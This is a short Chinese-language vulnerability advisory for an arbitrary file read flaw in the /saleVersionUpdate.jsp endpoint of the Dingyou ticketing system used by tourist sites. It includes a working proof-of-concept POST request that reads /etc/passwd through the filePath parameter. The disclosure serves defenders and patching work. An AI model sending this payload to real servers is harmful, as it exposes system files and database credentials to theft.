鼎游票务系统 /saleVersionUpdate.jsp 文件读取漏洞

2026-09-29 PoC Public

Description

鼎游票务系统是一款面向旅游行业的票务销售与管理业务系统,提供门票销售、订单管理、景区检票等业务功能,广泛应用于景区、场馆等旅游场景。其 /saleVersionUpdate.jsp 接口存在文件读取漏洞,攻击者可构造特殊请求读取服务器上的任意文件,获取系统配置、数据库凭据等敏感信息,进而可能进一步控制服务器。

PoC

POST /saleVersionUpdate.jsp HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

filePath=/etc/passwd

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References